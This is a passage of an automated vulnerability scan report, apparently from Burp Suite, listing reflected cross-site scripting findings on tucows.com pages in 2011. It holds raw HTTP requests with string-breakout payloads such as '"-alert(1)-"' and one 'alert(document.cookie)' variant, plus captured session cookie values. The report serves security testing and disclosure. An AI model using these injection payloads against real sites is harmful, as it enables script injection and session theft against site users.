Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/search.html86474"-alert(1)-"fc2d258ee4e";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.100. http://www.tucows.com/images/newassets/search.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/search.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e494d"-alert(1)-"4b77aa9c219 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/search.html?e494d"-alert(1)-"4b77aa9c219=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/search.html?e494d"-alert(1)-"4b77aa9c219=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.101. http://www.tucows.com/images/newassets/sitemap.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/sitemap.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af8d9"-alert(1)-"92a1570dd92 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagesaf8d9"-alert(1)-"92a1570dd92/newassets/sitemap.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:55 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/imagesaf8d9"-alert(1)-"92a1570dd92/newassets/sitemap.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.102. http://www.tucows.com/images/newassets/sitemap.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/sitemap.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82496"-alert(1)-"c8a91aceec7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets82496"-alert(1)-"c8a91aceec7/sitemap.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets82496"-alert(1)-"c8a91aceec7/sitemap.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.103. http://www.tucows.com/images/newassets/sitemap.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/sitemap.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload caf6a"-alert(1)-"44f43ba9b50 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/sitemap.htmlcaf6a"-alert(1)-"44f43ba9b50 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/sitemap.htmlcaf6a"-alert(1)-"44f43ba9b50";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.104. http://www.tucows.com/images/newassets/sitemap.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/sitemap.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 220eb"-alert(1)-"e4076721429 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/sitemap.html?220eb"-alert(1)-"e4076721429=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:30 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/sitemap.html?220eb"-alert(1)-"e4076721429=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.105. http://www.tucows.com/images/newassets/terms.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/terms.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33aa5"-alert(1)-"59cc111f4af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images33aa5"-alert(1)-"59cc111f4af/newassets/terms.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images33aa5"-alert(1)-"59cc111f4af/newassets/terms.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.106. http://www.tucows.com/images/newassets/terms.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/terms.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b47ad"-alert(1)-"799fe703e28 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassetsb47ad"-alert(1)-"799fe703e28/terms.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassetsb47ad"-alert(1)-"799fe703e28/terms.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.107. http://www.tucows.com/images/newassets/terms.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/terms.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 102d4"-alert(1)-"f3c9b91e18e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/terms.html102d4"-alert(1)-"f3c9b91e18e HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/terms.html102d4"-alert(1)-"f3c9b91e18e";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.108. http://www.tucows.com/images/newassets/terms.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/terms.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5eabf"-alert(1)-"20d1d0ffbba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/terms.html?5eabf"-alert(1)-"20d1d0ffbba=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/terms.html?5eabf"-alert(1)-"20d1d0ffbba=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.109. http://www.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae2fb"-alert(1)-"6d8934a62dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includesae2fb"-alert(1)-"6d8934a62dd/corpbar/cb3.0/css/style.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includesae2fb"-alert(1)-"6d8934a62dd/corpbar/cb3.0/css/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.110. http://www.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f85d"-alert(1)-"109c256849a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

